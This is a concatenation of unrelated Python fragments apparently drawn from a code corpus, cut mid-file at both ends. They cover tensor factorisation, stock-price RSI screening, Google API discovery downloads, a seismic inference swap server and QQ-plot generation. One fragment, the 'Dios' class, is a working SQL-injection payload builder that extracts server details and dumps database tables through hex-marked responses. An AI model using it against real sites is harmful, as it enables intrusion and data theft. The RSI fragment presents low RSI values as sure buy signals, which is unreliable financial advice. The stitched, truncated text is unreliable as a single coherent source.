print "Usage: ", sys.argv[0], "[input] [output]"
exit(1)
reverse_items(sys.argv[1], sys.argv[2])
| nilq/baby-python | python |
import binascii
class Dios:
startSQLi = "0x3C73716C692D68656C7065723E" # <sqli-helper>
endSQLi = "0x3C2F73716C692D68656C7065723E" # </sqli-helper>
endData = "0x3c656e642f3e" # <end/>
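# Hex-encoded markers wrap the extracted data so it can be located in the HTTP response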
def build(self, query):
return f"(select+concat({self.startSQLi},(select+concat({query})),{self.endSQLi}))"
def dump_data(self, tables, columns, database, level=1):
response_query = ''
if level == 1:
column_query = ''
for column in columns:
column = column.strip(' ')
query = "0x" + self.strTohex(f"<{column}>");
query += f",{column},"
query += "0x" + self.strTohex(f"</{column}>");
column_query += query + ","
column_query = column_query.strip(",")
response_query = f"(SELECT+GROUP_CONCAT({column_query},{self.endData})+FROM+{database}.{tables})"
return response_query
def get_information(self,level=1):
if level == 1:
dios = f"(select+concat({self.startSQLi},(select+concat({self.hostname()},{self.port()},{self.user()},{self.version()},{self.database()},{self.os_version()},{self.mechine_version()},{self.base_dir()},{self.data_dir()},{self.ssl()},{self.openssl()},{self.symlink()},{self.socket()})),{self.endSQLi}))"
return dios
def show_columns(self, table_name, dbname, level=1):
if level == 1:
dios = f"(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x{self.strTohex(table_name)}+and+table_schema=0x{self.strTohex(dbname)})"
return dios
# Get all database
def databases(self, level=1):
if level == 1:
dios = f"(select+group_concat(DISTINCT(table_schema))+from+information_schema.columns)"
return dios
def strTohex(self, string):
hexa = binascii.hexlify(string.encode("utf-8"))
hexa = hexa.decode("utf-8")
return hexa
def hexTostr(self, hexa):
string = binascii.unhexlify(hexa.encode("utf-8"))
string = string.decode("utf-8")
return string
def addslashes(self, s):
d = {'"':'\\"', "'":"\\'", "\0":"\\\0", "\\":"\\\\"}
return ''.join(d.get(c, c) for c in s)
# Method get Information from target
# Hostname
def hostname(self, level=1):
if level == 1:
hostname = f"0x{self.strTohex('<hostname()>')},/*!00000@@hostname*/,0x{self.strTohex('</hostname()>')}"
# print(hostname, level)
return hostname
# Port
def port(self, level=1):
if level == 1:
port = f"0x{self.strTohex('<port()>')},/*!00000@@port*/,0x{self.strTohex('</port()>')}"
return port
# Version
def version(self, level=1):
if level == 1:
version = f"0x{self.strTohex('<version>')},/*!00000@@version*/,0x{self.strTohex('</version>')}"
return version
# User
def user(self, level=1):
if level == 1:
user = f"0x{self.strTohex('<user()>')},/*!00000user()*/,0x{self.strTohex('</user()>')}"
return user
# Database
def database(self, level=1):
if level == 1:
database = f"0x{self.strTohex('<schema()>')},/*!00000schema()*/,0x{self.strTohex('</schema()>')}"
return database
# os_version
def os_version(self, level=1):
if level == 1:
os_version = f"0x{self.strTohex('<os_version>')},/*!00000@@version_compile_os*/,0x{self.strTohex('</os_version>')}"
return os_version
# mechine_version
def mechine_version(self, level=1):
if level == 1:
mechine_version = f"0x{self.strTohex('<mechine_version>')},/*!00000@@VERSION_COMPILE_MACHINE*/,0x{self.strTohex('</mechine_version>')}"
return mechine_version
# base_dir
def base_dir(self, level=1):
if level == 1:
base_dir = f"0x{self.strTohex('<base_dir>')},/*!00000@@basedir*/,0x{self.strTohex('</base_dir>')}"
return base_dir
# data_dir
def data_dir(self, level=1):
if level == 1:
data_dir = f"0x{self.strTohex('<data_dir>')},/*!00000@@datadir*/,0x{self.strTohex('</data_dir>')}"
return data_dir
# ssl
def ssl(self, level=1):
if level == 1:
ssl = f"0x{self.strTohex('<ssl>')},/*!00000@@GLOBAL.have_ssl*/,0x{self.strTohex('</ssl>')}"
return ssl
# openssl
def openssl(self, level=1):
if level == 1:
openssl = f"0x{self.strTohex('<openssl>')},/*!00000@@GLOBAL.have_openssl*/,0x{self.strTohex('</openssl>')}"
return openssl
# symlink
def symlink(self, level=1):
if level == 1:
symlink = f"0x{self.strTohex('<symlink>')},/*!00000@@GLOBAL.have_symlink*/,0x{self.strTohex('</symlink>')}"
return symlink
# socket
def socket(self, level=1):
if level == 1:
socket = f"0x{self.strTohex('<socket>')},/*!00000@@socket*/,0x{self.strTohex('</socket>')}"
return socket
| nilq/baby-python | python |
'''
Created on Nov 11, 2018
@author: nilson.nieto
'''
lst =[1,2,3,4,5,6,7]
print(list(map(lambda a : a**2,lst))) | nilq/baby-python | python |
import warnings
import numpy as np
from hottbox.algorithms.decomposition.cpd import BaseCPD
from hottbox.core.structures import Tensor
from hottbox.core.operations import khatri_rao, hadamard
from hottbox.utils.generation.basic import super_diag_tensor
# TODO: Organise this better - lazy work around used
class CMTF(BaseCPD):
""" Coupled Matrix and Tensor factorization for two ``Tensors`` of order n and 2 with respect to a specified `rank`.
Computed via alternating least squares (ALS)
Parameters
----------
max_iter : int
Maximum number of iteration
epsilon : float
Threshold for the relative error of approximation.
tol : float
Threshold for convergence of factor matrices
random_state : int
verbose : bool
If True, enable verbose output
Attributes
----------
cost : list
A list of relative approximation errors at each iteration of the algorithm.
References
----------
- Acar, Evrim, Evangelos E. Papalexakis, Gozde Gurdeniz, Morten A. Rasmussen,
Anders J. Lawaetz, Mathias Nilsson and Rasmus Bro.
“Structure-revealing data fusion.” BMC Bioinformatics (2013).
- Jeon, Byungsoo & Jeon, Inah & Sael, Lee & Kang, U. (2016).
SCouT: Scalable coupled matrix-tensor factorization—Algorithm and discoveries.
Int. Conf. Data Eng.. 811-822. 10.1109/ICDE.2016.7498292.
"""
# TODO: change init use requiring a change in TensorCPD
def __init__(self, max_iter=50, epsilon=10e-3, tol=10e-5,
random_state=None, verbose=False) -> None:
super(CMTF, self).__init__(init='random',
max_iter=max_iter,
epsilon=epsilon,
tol=tol,
random_state=random_state,
verbose=verbose)
self.cost = []
def copy(self):
""" Copy of the CPD algorithm as a new object """
new_object = super(CMTF, self).copy()
new_object.cost = []
return new_object
@property
def name(self):
""" Name of the decomposition
Returns
-------
decomposition_name : str
"""
decomposition_name = super(CMTF, self).name
return decomposition_name
def decompose(self, tensor, mlst, rank):
""" Performs factorisation using ALS on the two instances of ``tensor``
with respect to the specified ``rank``
Parameters
----------
tensor : Tensor
Multi-dimensional data to be decomposed
mlst : List of `Tensor`
List of two-dimensional `Tensor` to be decomposed
rank : tuple
Desired Kruskal rank for the given ``tensor``. Should contain only one value.
If it is greater then any of dimensions then random initialisation is used
Returns
-------
(fmat_a, fmat_b, t_recon, m_recon) : List(np.ndarray) or np.ndarray
fmat_a, fmat_b are the list of components obtained by applying CMTF
t_recon, m_recon : The reconstructed tensor and list of matrices
"""
if not isinstance(tensor, Tensor):
raise TypeError("Parameter `tensor` should be `Tensor`!")
if not isinstance(mlst, list):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not isinstance(rank, tuple):
raise TypeError("Parameter `rank` should be passed as a tuple!")
if len(rank) != 1:
raise ValueError("Parameter `rank` should be tuple with only one value!")
if not all(isinstance(m, Tensor) for m in mlst):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not all(m.order == 2 for m in mlst):
raise ValueError("All elements of `mlst` should be of order 2. It is a list of matrices!")
modes = np.array([list(m.shape) for m in mlst])
num_modes = len(modes)
fmat_a, fmat_b = self._init_fmat(modes[:, 0], modes[:, 1], rank)
norm = tensor.frob_norm
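# ALS sweep: each tensor factor is solved jointly against the unfolded tensor
# and its coupled matrix, then the matrix factors are refit via pseudo-inverse.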
for n_iter in range(self.max_iter):
# Update tensor factors
for i in range(num_modes):
_v = hadamard([np.dot(a_i.T, a_i) for k, a_i in enumerate(fmat_a) if k != i])
_v += fmat_b[i].T.dot(fmat_b[i])
kr_result = khatri_rao(fmat_a, skip_matrix=i, reverse=True)
_prod_a = np.concatenate([tensor.unfold(i, inplace=False).data, mlst[i].data], axis=1)
_prod_b = np.concatenate([kr_result.T, fmat_b[i].T], axis=1).T
fmat_a[i] = _prod_a.dot(_prod_b).dot(np.linalg.pinv(_v))
for i in range(num_modes):
fmat_b[i] = mlst[i].data.T.dot(np.linalg.pinv(fmat_a[i]).T)
t_recon, m_recon = self._reconstruct(fmat_a, fmat_b, num_modes)
residual = np.linalg.norm(tensor.data-t_recon.data)
for i in range(num_modes):
residual += np.linalg.norm(mlst[i].data-m_recon[i].data)
self.cost.append(abs(residual)/norm)
if self.verbose:
print('Iter {}: relative error of approximation = {}'.format(n_iter, self.cost[-1]))
# Check termination conditions
if self.cost[-1] <= self.epsilon:
if self.verbose:
print('Relative error of approximation has reached the acceptable level: {}'
.format(self.cost[-1]))
break
if self.converged:
if self.verbose:
print('Converged in {} iteration(s)'.format(len(self.cost)))
break
if self.verbose and not self.converged and self.cost[-1] > self.epsilon:
print('Maximum number of iterations ({}) has been reached. '
'Variation = {}'.format(self.max_iter, abs(self.cost[-2] - self.cost[-1])))
# TODO: possibly make another structure
return fmat_a, fmat_b, t_recon, m_recon
@property
def converged(self):
""" Checks convergence of the CPD-ALS algorithm.
Returns
-------
bool
"""
        # This ensures that the cost has been computed at least twice, without explicitly checking the iteration count
try:
is_converged = abs(self.cost[-2] - self.cost[-1]) <= self.tol
except IndexError:
is_converged = False
return is_converged
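    # For illustration (hypothetical numbers): with cost == [0.200018, 0.200009]
    # and tol == 1e-5, abs(cost[-2] - cost[-1]) is about 9e-6, which is <= tol,
    # so the ALS loop in `decompose` terminates early.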
def _init_fmat(self, shape_i, shape_j, rank):
""" Initialisation of matrices used in CMTF
Parameters
----------
shape_i : np.ndarray(int)
Shape[0] of all matrices
shape_j : np.ndarray(int)
Shape[1] of all matrices
rank : int
The rank specified for factorisation
Returns
-------
(fmat_a, fmat_b) : List(np.ndarray)
Two lists of the factor matrices
"""
self.cost = [] # Reset cost every time when method decompose is called
_r = rank[0]
if (np.array(shape_i) < _r).sum() != 0:
warnings.warn(
"Specified rank is greater then one of the dimensions of a tensor ({} > {}).\n"
"Factor matrices have been initialized randomly.".format(_r, shape_i), RuntimeWarning
)
fmat_a = [np.random.randn(i_n, _r) for i_n in shape_i]
fmat_b = [np.random.randn(j_n, _r) for j_n in shape_j]
return fmat_a, fmat_b
@staticmethod
def _reconstruct(fmat_a, fmat_b, n_mat):
""" Reconstruct the tensor and matrix after the coupled factorisation
Parameters
----------
fmat_a : List(np.ndarray)
Multidimensional data obtained from the factorisation
fmat_b : List(np.ndarray)
Multidimensional data obtained from the factorisation
n_mat : int
Number of matrices provided to fuse
Returns
-------
(core_tensor, lrecon) : np.ndarray or List(np.ndarray)
Reconstructed tensor and list of matrices obtained from the factorisation
"""
core_values = np.repeat(np.array([1]), fmat_a[0].shape[1])
_r = (fmat_a[0].shape[1], )
core_shape = _r * len(fmat_a)
core_tensor = super_diag_tensor(core_shape, values=core_values)
for mode, fmat in enumerate(fmat_a):
core_tensor.mode_n_product(fmat, mode=mode, inplace=True)
lrecon = [Tensor(fmat_a[i].dot(fmat_b[i].T)) for i in range(n_mat)]
return core_tensor, lrecon
def plot(self):
print('At the moment, `plot()` is not implemented for the {}'.format(self.name))
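
# A minimal, self-contained NumPy sketch (hypothetical shapes, independent of
# the Tensor class used above) of the coupled reconstruction performed by
# `_reconstruct`: the tensor is rebuilt as a sum of rank-one terms from `fmat_a`,
# and each coupled matrix is approximated as fmat_a[i].dot(fmat_b[i].T).
if __name__ == "__main__":
    import numpy as np
    rank = 2
    fmat_a = [np.random.randn(n, rank) for n in (4, 5, 6)]  # tensor factors
    fmat_b = [np.random.randn(3, rank) for _ in range(3)]   # matrix factors
    # CP reconstruction: T[i, j, k] = sum_r A0[i, r] * A1[j, r] * A2[k, r]
    t_recon = np.einsum('ir,jr,kr->ijk', *fmat_a)
    m_recon = [a.dot(b.T) for a, b in zip(fmat_a, fmat_b)]
    print(t_recon.shape, [m.shape for m in m_recon])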
| nilq/baby-python | python |
import pathlib
import pandas as pd
from util import Util
# Returns a pandas DataFrame matching the specified conditions
class Dataset:
def __init__(
self,
feature_names,
target_name="target",
train_years=None,
test_years=None,
cities=None,
):
if feature_names is None:
feature_names = self.get_all_feature_names()
        # Name of the target variable
self.target_name = target_name
self.train_years = train_years
self.test_years = test_years
self.cities = cities
        # Columns used only inside Dataset
self.secret_feature_names = ["県名", "date"]
self.feature_names = feature_names.copy()
        for name in self.secret_feature_names.copy():  # iterate over a copy: the list is mutated below
if name in feature_names:
self.secret_feature_names.remove(name)
else:
self.feature_names.append(name)
base_dataset = Util.load_feature("basic_data")
datasets_list = []
for name in self.feature_names:
if name in base_dataset.columns:
datasets_list.append(base_dataset[name])
else:
feature = Util.load_feature(name)
datasets_list.append(feature)
self.dataset = pd.DataFrame().join(datasets_list, how="outer")
@classmethod
def get_all_feature_names(cls):
        # Get the names of all features
data = []
basic_data = Util.load_feature("basic_data")
globbed_files = pathlib.Path("./../features/").glob("*.pkl")
for globbed_file in globbed_files:
file_name = globbed_file.name
if file_name == "basic_data.pkl":
continue
data.append(Util.load_feature(file_name[:-4]))
data = basic_data.join(data, how="outer")
return data.columns
    # Filter by year
def __select_by_year(self, years, data=None):
def __to_year(data):
return data.year
if data is None:
data = self.dataset.copy()
if type(years) == int:
years = [years]
        # Drop rows that have no date information
data = data.dropna(subset=["date"])
adopted_index = False
for year in years:
adopted_index = (adopted_index) | (data["date"].map(__to_year) == year)
return data[adopted_index]
    # Filter by prefecture name
def __select_by_city(self, city_names, data=None):
if type(city_names) == str:
city_names = [city_names]
if data is None:
data = self.dataset.copy()
        # Drop rows that have no prefecture information
data = data.dropna(subset=["県名"])
return data[data["県名"].isin(city_names)]
    # Filter by year and prefecture name, returning a copy
def get_data(self, year, city):
data = self.__select_by_year(year)
data = self.__select_by_city(city, data)
data = data.drop(self.secret_feature_names, axis=1)
data = data.dropna(subset=[self.target_name])
data = data.dropna()
return data
    # Data for fiscal years 2008-2017
def get_train(self):
if self.train_years is not None and self.cities is not None:
return self.get_data(self.train_years, self.cities)
else:
return self.get_data([y for y in range(2008, 2018)], "tokyo")
    # Data for fiscal years 2018 and 2019
def get_test(self, option=None):
if self.test_years is not None and self.cities is not None:
return self.get_data(self.test_years, self.cities)
else:
return self.get_data([2018, 2019], "tokyo")
def add_past_day_data(self, days_ago, features=None):
if features is None:
features = list(self.dataset.columns.copy())
for name in self.secret_feature_names:
features.remove(name)
if type(days_ago) == int:
days_ago = [days_ago]
for i in days_ago:
for name in features:
self.dataset["p" + str(i) + name] = self.dataset[name].shift(-i)
| nilq/baby-python | python |
from openstatesapi.jurisdiction import make_jurisdiction
J = make_jurisdiction('ga')
J.url = 'http://georgia.gov'
| nilq/baby-python | python |
import numpy as np
import zmq
import logging
import time
from multiprocessing import Process
from sigvisa.infer.swap_rpc.sg_client import run_client
from sigvisa.infer.swap_rpc.swap_server import SwapServer
from sigvisa.infer.swap_rpc.swap_moves import crossover_uatemplates, crossover_event_region_move, swap_events_move
from sigvisa.infer.swap_rpc.serialization import serialize, deserialize
class SgSwapServer(SwapServer):
def __init__(self, *args, **kwargs):
super(SgSwapServer, self).__init__(*args, **kwargs)
self.scbs = {}
self.raw_signals = {}
def do_swap_helper(self, client1, client2):
socket1 = self.swap_sockets[client1]
socket2 = self.swap_sockets[client2]
# both clients should check in to be ready to receive commands
ack1 = socket1.recv()
ack2 = socket2.recv()
assert(ack1 == "SWAPPING")
assert(ack2 == "SWAPPING")
sg1 = SgRpcShim(socket1)
sg2 = SgRpcShim(socket2)
if client1 not in self.scbs:
self.scbs[client1] = sg1.get_scbs()
self.raw_signals[client1] = sg1.get_raw()
if client2 not in self.scbs:
self.scbs[client2] = sg2.get_scbs()
self.raw_signals[client2] = sg2.get_raw()
assert(self.scbs[client1] == self.scbs[client2])
scbs = list(self.scbs[client1])
raw1 = self.raw_signals[client1]
raw2 = self.raw_signals[client2]
"""
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2,
crossover_period_s=5.0,
crossover_period_pre_s = 2.0)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates_short", accepted)
sg2.move_finished("crossover_uatemplates_short", accepted)
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates", accepted)
sg2.move_finished("crossover_uatemplates", accepted)
"""
accepted = crossover_event_region_move(sg1, sg2, raw1, raw2,
crossover_radius_km=1000,
crossover_radius_s=2000)
logging.info("event region crossover accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_region", accepted)
sg2.move_finished("crossover_event_region", accepted)
accepted = swap_events_move(sg1, sg2, raw1, raw2)
logging.info("event swap accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_swap", accepted)
sg2.move_finished("crossover_event_swap", accepted)
sg1.done()
sg2.done()
self._cleanup_swap(client1, client2)
class SgRpcShim(object):
def __init__(self, socket):
self.socket = socket
def get_raw(self):
return self._send_cmd("GET_RAW", kwargs={})
def get_scbs(self):
return self._send_cmd("GET_SCBS", kwargs={})
def get_event_locs(self):
cmd = "GET_EVENT_LOCS"
return self._send_cmd(cmd, kwargs={})
def get_event_templates(self, eid):
kwargs = {"eid": eid}
cmd = "GET_EVENT_TEMPLATES"
return self._send_cmd(cmd, kwargs=kwargs)
def kill_event(self, eid):
kwargs = {"eid": eid}
cmd = "KILL_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def birth_event(self, evdict, tmvals, force_id=None):
kwargs = {"evdict": evdict, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def current_log_p(self):
cmd = "CURRENT_LOG_P"
return self._send_cmd(cmd, kwargs={})
def current_log_p_breakdown(self):
cmd = "BREAKDOWN"
return self._send_cmd(cmd, kwargs={})
def birth_template(self, scb, tmvals, force_id=None):
kwargs = {"scb": scb, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def kill_template(self, tmid):
kwargs = {"tmid": tmid}
cmd = "KILL_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def set_template(self, tmid, tmvals):
kwargs = {"tmvals": tmvals, "tmid": tmid}
cmd = "SET_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def logp_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "LOGP_AT_SCB"
return self._send_cmd(cmd, kwargs)
def uatemplates_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "UATEMPLATES_AT_SCB"
return self._send_cmd(cmd, kwargs)
def dump_img_scb(self, scb, label):
cmd = "DUMP_IMG_SCB"
kwargs = {"scb": scb, "label": label}
return self._send_cmd(cmd, kwargs)
def debug(self):
msg = "DEBUG"
self.socket.send(msg)
def move_finished(self, move_name, accepted):
cmd = "COUNT"
kwargs = {"move_name": move_name, "accepted": accepted}
return self._send_cmd(cmd, kwargs)
def done(self):
msg = "DONE"
self.socket.send(msg)
def _send_cmd(self, cmd, kwargs):
argstr = serialize(kwargs)
msg = cmd + " " + argstr
self.socket.send(msg)
rstr = self.socket.recv()
resp = deserialize(rstr)
#print "cmd", cmd, "response", rstr, "deserialized", resp
return resp
def run_parallel_coarse_to_fine(names, specs,
server_only=False, client_only=None,
min_swap_s = 20.0,
max_swap_s = 45.0,
allowable_wait_s = 0.5):
# names is an ordered list of strings naming each thread.
# - we will only ever run swap moves between adjacent threads
# specs is a dict mapping name:(modelspec, runspec)
processes = {}
def chain_neighbors(a):
# given a list, return a dict encoding the graph where each
# entry is connected to its predecessor and successor.
d = {}
for i, x in enumerate(a):
d[x] = []
if i > 0:
d[x].append(a[i-1])
if i < len(a)-1:
d[x].append(a[i+1])
return d
control_port=5555
neighbors = chain_neighbors(names)
if client_only is not None:
name = client_only
ms, rs = specs[name]
run_client(name, ms, rs, control_port)
return
if not server_only:
for name in names:
ms, rs = specs[name]
processes[name] = Process(target=run_client, kwargs={"name": name,
"modelspec": ms,
"runspec": rs,
"port": control_port})
processes[name].start()
serv = SgSwapServer(neighbors=neighbors,
min_swap_s = min_swap_s,
allowable_wait_s = allowable_wait_s,
port=control_port)
rootLogger = logging.getLogger()
rootLogger.setLevel("INFO")
def any_children_alive():
if server_only:
return True
for name in names:
if processes[name].is_alive():
return True
return False
while any_children_alive():
serv.process()
logging.debug( "state dump: %s " % serv.client_state)
| nilq/baby-python | python |
#!/usr/bin/env python
# coding: utf-8
# In[79]:
'''
https://github.com/bbmusa
'''
from pandas_datareader import data as pdr
from yahoo_fin import stock_info as si
# In[2]:
import pandas as pd
# In[3]:
import numpy as np
# In[7]:
tickers = si.tickers_nifty50()
# In[17]:
tickers.remove('MM.NS')
# In[72]:
start_date = '2021-11-10'
end_date = '2022-02-14'
# In[73]:
'''
J. Welles Wilder's RSI indicator simply finds blue-chip gold mines for you.
'''
def download_all_stock_data(all_stock_symbols, start_date, end_date):
def download_stock_data(single_symbol):
print(' Downloading '+single_symbol+' data ')
# try:
tmp1=pdr.get_data_yahoo(single_symbol,start=start_date,end=end_date)
# except KeyError:
# pass
return(tmp1)
downloaded_data=map(download_stock_data,all_stock_symbols)
return(pd.concat(downloaded_data,keys=all_stock_symbols, names=['Ticker','Date']))
# In[74]:
stock_data=download_all_stock_data(tickers, start_date, end_date)
fileName = 'downloadedData.pkl'
stock_data.to_pickle(fileName)
# In[80]:
'''
RSI = 100 - 100 / (1 + RS)
RS = average gain / average loss
This RSI is based on 14 periods, which means:
+ first average gain = sum of gains over the 14 periods / 14
+ first average loss = sum of losses over the 14 periods / 14
'''
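# Worked example of the formula above (hypothetical averages): with an average
# gain of 1.0 and an average loss of 0.5 over 14 periods, RS = 1.0 / 0.5 = 2.0
# and RSI = 100 - 100 / (1 + 2.0) ≈ 66.67.
_rs_example = 1.0 / 0.5
assert round(100 - 100 / (1 + _rs_example), 2) == 66.67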
def compute_RSI(data,period_RSI):
differencePrice = data['Close'].diff()
differencePriceValues=differencePrice.values
positive_differences=0
negative_differences=0
current_average_positive=0
current_average_negative=0
price_index=0
RSI=[]
for difference in differencePriceValues[1:]:
if difference>0:
positive_difference=difference
negative_difference=0
if difference<0:
negative_difference=np.abs(difference)
positive_difference=0
if difference==0:
negative_difference=0
positive_difference=0
if (price_index<period_RSI):
current_average_positive=current_average_positive+(1/period_RSI)*positive_difference
current_average_negative=current_average_negative+(1/period_RSI)*negative_difference
if(price_index==(period_RSI-1)):
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
else:
current_average_positive=((period_RSI-1)*current_average_positive+positive_difference)/(period_RSI)
current_average_negative=((period_RSI-1)*current_average_negative+negative_difference)/(period_RSI)
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
price_index=price_index+1
RSI_series=pd.Series(data=RSI,index=differencePrice.index[period_RSI:])
return(RSI_series)
# In[76]:
RSI_all_ticker=pd.Series(index=tickers)
for stock_symbol in tickers:
test1=compute_RSI(stock_data.loc[stock_symbol],28)
RSI_all_ticker.loc[stock_symbol]=test1[-1]
RSI_all_ticker.plot(figsize=(12,12))
# In[77]:
RSI_all_ticker.idxmin()
# In[78]:
'''
We consider a particular stock overbought if its RSI is above 70 and
oversold if it is below 30.
Generally, people take RSI < 40 as a rocket (a strong buy candidate).
'''
RSI_all_ticker.nsmallest(80)
# In[ ]:
# In[ ]:
| nilq/baby-python | python |
#!/usr/bin/python3.7
from aiogoogle import Aiogoogle
import os
import sys
import errno
import json
import asyncio
from aiohttp import ClientSession
from aiogoogle import HTTPError
import pprint
def _check_for_correct_cwd(current_dir):
if current_dir[-9:] != "aiogoogle": # current dir is aiogoogle
print(current_dir)
print("must be in aiogoogle's dir, not test dir")
sys.exit()
def _pop_unstable_apis(all_apis: list):
stable_apis = []
for api in all_apis:
        if not len(api[1]) > 3:  # No funky versions because they break the tests a lot
stable_apis.append(api)
return stable_apis
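# For example, ('drive', 'v3') is kept above, while ('admin', 'directory_v1')
# is dropped because its version string is longer than three characters.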
async def refresh_disc_docs_json():
file_errors = []
current_dir = os.getcwd()
    # Create a new data/ dir if one doesn't exist
_check_for_correct_cwd(current_dir)
# Refresh all_apis in tests/tests_globals.py
all_apis = []
final_all_apis = []
async with ClientSession() as sess:
apis_pref = await sess.get(
"https://www.googleapis.com/discovery/v1/apis?preferred=true"
)
apis_pref = await apis_pref.json()
for api in apis_pref["items"]:
all_apis.append((api["name"], api["version"]))
all_apis = _pop_unstable_apis(all_apis)
final_all_apis = all_apis
async with Aiogoogle() as google:
tasks = [google.discover(name, version) for (name, version) in all_apis]
print('Requesting all APIs, this might take a while')
all_discovery_documents = await asyncio.gather(*tasks, return_exceptions=True)
# Refresh discovery files in tests/data
for i, google_api in enumerate(all_discovery_documents):
name = all_apis[i][0]
version = all_apis[i][1]
if isinstance(google_api, HTTPError):
e = google_api
if e.res.status_code != 404:
                print('Non-404 error')
                print('\033[91m\n' + str(e) + '\n\033[0m')
if e.res.status_code == 404:
# only ignore if it's a 404 error. Should raise an error otherwise
final_all_apis = list(filter(lambda api: (api[0] != name), final_all_apis))
file_errors.append({f"{name}-{version}": str(e)})
print(f'\033[91mError: Failed to download {name} {version}\033[0m')
continue
data_dir_name = current_dir + "/tests/data/"
try:
if not os.path.exists(data_dir_name):
os.makedirs(data_dir_name)
except OSError as e:
if e.errno != errno.EEXIST:
raise
        # Save discovery document as a .json file to the newly created data dir
file_name = (
current_dir
+ "/tests/data/"
+ name
+ "_"
+ version
+ "_discovery_doc.json"
)
with open(file_name, "w") as discovery_file:
json.dump(google_api.discovery_document, discovery_file)
print(f"saved {name}-{version} to {file_name}")
print("Done")
if file_errors:
print(f"Errors found: {str(file_errors)}")
with open("tests/ALL_APIS.py", "w") as f:
f.write("""### This file is autogenerated ###\n""")
f.write(f"ALL_APIS = {pprint.pformat(final_all_apis)}")
print("SUCCESS!")
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(refresh_disc_docs_json())
| nilq/baby-python | python |
"""
Create json files which can be used to render QQ plots.
Extracted from PheWeb: 2cfaa69
"""
# TODO: make gc_lambda for maf strata, and show them if they're >1.1?
# TODO: copy some changes from <https://github.com/statgen/encore/blob/master/plot-epacts-output/make_qq_json.py>
# Peter has included some original notes on the processing requirements, as follows::
# TODO: reduce QQ memory using Counter(v.qval for v in variants).
# - but we still need to split into 4 strata using MAF. Can that be done efficiently?
# a) we could keep balanced lists for the 4 strata, but we can only be confidently start processing variants
# once we've read 3/4 of all variants
# b) we could assume that, since we're sorted by chr-pos-ref-alt, MAF should be pretty randomly ordered.
# - then we could start processing variants after reading only 10% of all variants
# - if we're wrong, `raise StrataGuessingFailed()` and try again with sorting.
# c) we could run manhattan before this, and make it track Counter(rounded(v.maf,2) for v in variants).
# NOTE: `qval` means `-log10(pvalue)`
import collections
import logging
import math
import typing as ty
import boltons.iterutils
import boltons.mathutils
import scipy.stats
from zorp.parsers import BasicVariant
NUM_BINS = 400
NUM_MAF_RANGES = 4
MAF_SIGFIGS = 2
logger = logging.getLogger(__name__)
Variant = collections.namedtuple('Variant', ['qval', 'maf'])
def augment_variants(variants: ty.Iterator[BasicVariant], num_samples=None):
for var in variants:
if var.pvalue == 0:
# FIXME: Why does QQ plot require this stub value?
qval = 1000 # TODO(pjvh): make an option "convert_pval0_to = [num|None]"
else:
qval = var.neg_log_pvalue
af = var.maf
if af is not None:
af = round(af, MAF_SIGFIGS)
yield Variant(qval=qval, maf=af)
def round_sig(x, digits):
if x == 0:
return 0
elif abs(x) == math.inf or math.isnan(x):
raise ValueError("Cannot round infinity or NaN")
else:
log = math.log10(abs(x))
digits_above_zero = int(math.floor(log))
return round(x, digits - 1 - digits_above_zero)
# TODO: Move these to unit tests
assert round_sig(0.00123, 2) == 0.0012
assert round_sig(1.59e-10, 2) == 1.6e-10
def approx_equal(a, b, tolerance=1e-4):
return abs(a - b) <= max(abs(a), abs(b)) * tolerance
# TODO: Move these to unit tests
assert approx_equal(42, 42.0000001)
assert not approx_equal(42, 42.01)
def make_qq_stratified(variants):
# Some variants may be missing MAF. Sort those at the end of the list (eg, lump with the common variants)
variants = sorted(variants, key=lambda v: (v.maf is None, v.maf))
def make_strata(idx):
# Note: slice_indices[1] is the same as slice_indices[0] of the next slice.
# But that's not a problem, because range() ignores the last index.
slice_indices = (len(variants) * idx // NUM_MAF_RANGES,
len(variants) * (idx + 1) // NUM_MAF_RANGES)
qvals = sorted((variants[i].qval for i in range(*slice_indices)), reverse=True)
return {
'maf_range': (variants[slice_indices[0]].maf,
variants[slice_indices[1] - 1].maf),
'count': len(qvals),
'qq': compute_qq(qvals),
}
return [make_strata(i) for i in range(NUM_MAF_RANGES)]
def make_qq_unstratified(variants, include_qq):
qvals = sorted((v.qval for v in variants), reverse=True)
rv = {}
if include_qq:
rv['qq'] = compute_qq(qvals)
rv['count'] = len(qvals)
rv['gc_lambda'] = {}
for perc in ['0.5', '0.1', '0.01', '0.001']:
gc = gc_value_from_list(qvals, float(perc))
if math.isnan(gc) or abs(gc) == math.inf:
logger.warning('WARNING: got gc_value {!r}'.format(gc))
else:
rv['gc_lambda'][perc] = round_sig(gc, 5)
return rv
def compute_qq(qvals):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
if len(qvals) == 0:
return []
if qvals[0] == 0:
logger.warning('WARNING: All pvalues are 1! How is that supposed to make a QQ plot?')
return []
max_exp_qval = -math.log10(0.5 / len(qvals))
    # Our QQ plot will only show `obs_qval` up to `ceil(2*max_exp_qval)`.
# So we can drop any obs_qval above that, to save space and make sure the visible range gets all the NUM_BINS.
# this calculation must avoid dropping points that would be shown by the calculation done in javascript.
# `max_obs_qval` means the largest observed -log10(pvalue) that will be shown in the plot. It's usually NOT the
# largest in the data.
max_obs_qval = boltons.mathutils.clamp(qvals[0],
